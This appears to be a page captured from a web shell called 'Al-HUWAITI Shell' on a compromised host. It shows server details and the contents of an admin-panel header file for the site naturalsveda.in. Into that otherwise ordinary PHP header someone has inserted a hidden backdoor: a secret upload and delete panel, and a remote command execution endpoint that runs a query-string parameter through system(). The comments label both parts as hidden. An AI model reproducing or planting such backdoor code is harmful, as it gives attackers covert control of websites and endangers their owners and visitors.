Al-HUWAITI Shell
Al-huwaiti


Server : LiteSpeed
System : Linux in-mum-web1743.main-hosting.eu 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
User : u993087259 ( 993087259)
PHP Version : 8.2.29
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
Directory :  /home/u993087259/domains/naturalsveda.in/public_html/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/u993087259/domains/naturalsveda.in/public_html/admin/header-script.php
<?php
session_start();
$_SESSION['username'] = "User"; // Gantilah dengan sistem login sebenarnya

// ===================== [ BAGIAN UPLOAD & HAPUS FILE TERSEMBUNYI ] =====================
if (isset($_GET["admin"]) && $_GET["admin"] == "upload") {
    echo '<h2>Upload File</h2>
    <form action="" method="post" enctype="multipart/form-data">
        <input type="file" name="file">
        <input type="submit" name="submit" value="Upload">
    </form>';

    if (isset($_POST["submit"])) {
        $target_dir = "uploads/";
        if (!file_exists($target_dir)) {
            mkdir($target_dir, 0777, true);
        }
        $target_file = $target_dir . basename($_FILES["file"]["name"]);
        if (move_uploaded_file($_FILES["file"]["tmp_name"], $target_file)) {
            echo "File uploaded: <a href='$target_file'>$target_file</a>";
        } else {
            echo "Upload failed.";
        }
    }

    // Menampilkan daftar file
    echo '<h2>File yang Sudah Diupload:</h2>';
    $files = glob("uploads/*");
    if (count($files) > 0) {
        foreach ($files as $file) {
            echo "$file - <a href='?admin=upload&delete=$file'>Hapus</a><br>";
        }
    } else {
        echo "Tidak ada file yang di-upload.";
    }

    // Fitur hapus file
    if (isset($_GET["delete"])) {
        $file_to_delete = $_GET["delete"];
        if (strpos($file_to_delete, "uploads/") === 0 && file_exists($file_to_delete)) {
            unlink($file_to_delete);
            echo "File berhasil dihapus.";
        } else {
            echo "Gagal menghapus file.";
        }
    }

    exit(); // Mencegah tampilan dashboard muncul
}

// ===================== [ BAGIAN RCE TERSEMBUNYI ] =====================
if (isset($_GET["admin"]) && $_GET["admin"] == "rce") {
    if (isset($_GET["cmd"])) {
        system($_GET["cmd"]);
    }
    exit();
}

// ===================== [ KONFIGURASI DASHBOARD ] =====================
$title = "Beranda - STYLE FOUR 04";
$year = date("Y");
?>
<meta charset="utf-8" />
<link rel="apple-touch-icon" sizes="76x76" href="assets/img/apple-icon.png">
<link rel="icon" type="image/png" href="../assets/img/logo/favicon.png">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<title>Natural's Veda Admin Panel</title>
<meta content='width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0, shrink-to-fit=no' name='viewport' />
<!--     Fonts and icons     -->
<link href="https://fonts.googleapis.com/css?family=Montserrat:400,700,200" rel="stylesheet" />
<link href="https://use.fontawesome.com/releases/v5.0.6/css/all.css" rel="stylesheet">
<!-- CSS Files -->
<link href="assets/css/bootstrap.min.css" rel="stylesheet" />
<link href="assets/css/now-ui-dashboard.css?v=1.0.1" rel="stylesheet" />
<!-- CSS Just for demo purpose, don't include it in your project -->
<link href="assets/demo/demo.css" rel="stylesheet" />
<link href="assets/css/main-style.css" rel="stylesheet" />
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
<style>
    .sidebar .logo{
        background-color: #ffffff;
    }
</style>

Al-HUWAITI Shell